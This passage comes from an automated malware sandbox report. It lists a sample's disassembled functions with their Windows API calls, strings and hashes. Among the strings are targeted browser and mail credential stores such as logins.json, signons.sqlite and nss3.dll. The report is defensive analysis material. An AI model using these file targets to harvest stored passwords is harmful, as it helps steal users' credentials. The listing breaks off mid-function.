                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                            Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D5C
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D7A
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D98
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408DA8
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@
                                            • String ID:
                                            • API String ID: 1033339047-0
                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                            Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.MSVCRT ref: 00406F4C
                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,74DF0A60,00407A43,00000001,?,00000000,74DF0A60,00407DBD,00000000,?,?), ref: 00406F64
                                            • free.MSVCRT ref: 00406F6D
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID:
                                            • API String ID: 3056473165-0
                                            • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                            • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                            Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFontIndirect_mbscpymemset
                                            • String ID: Arial
                                            • API String ID: 3853255127-493054409
                                            • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                            • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                            Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strlen$_strcmpimemset
                                            • String ID: /stext
                                            • API String ID: 520177685-3817206916
                                            • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                            • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                            Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadProc
                                            • String ID:
                                            • API String ID: 145871493-0
                                            • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                            • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                            Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                            • String ID:
                                            • API String ID: 4165544737-0
                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                            Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                            Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                            Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                            Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: EnumNamesResource
                                            • String ID:
                                            • API String ID: 3334572018-0
                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                            Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                            Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                            Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                            Non-executed Functions

                                            Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                            • DeleteObject.GDI32(?), ref: 00401226
                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                            • ShowWindow.USER32(00000000), ref: 00401253
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                            • ShowWindow.USER32(00000000), ref: 00401262
                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                            • memset.MSVCRT ref: 0040128E
                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                            • String ID:
                                            • API String ID: 2998058495-0
                                            • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                            • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                            Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                            • API String ID: 633282248-1996832678
                                            • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                            • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                            Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: sprintf$memset$_mbscpy
                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                            • API String ID: 3402215030-3842416460
                                            • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                            • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                            Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                            • strlen.MSVCRT ref: 0040F139
                                            • strlen.MSVCRT ref: 0040F147
                                            • memset.MSVCRT ref: 0040F187
                                            • strlen.MSVCRT ref: 0040F196
                                            • strlen.MSVCRT ref: 0040F1A4
                                            • memset.MSVCRT ref: 0040F1EA
                                            • strlen.MSVCRT ref: 0040F1F9
                                            • strlen.MSVCRT ref: 0040F207
                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                            • API String ID: 2003275452-3138536805
                                            • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                            • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                            Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040C3F7
                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                            • strrchr.MSVCRT ref: 0040C417
                                            • _mbscat.MSVCRT ref: 0040C431
                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                            • API String ID: 1012775001-1343505058
                                            • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                            • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                            Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
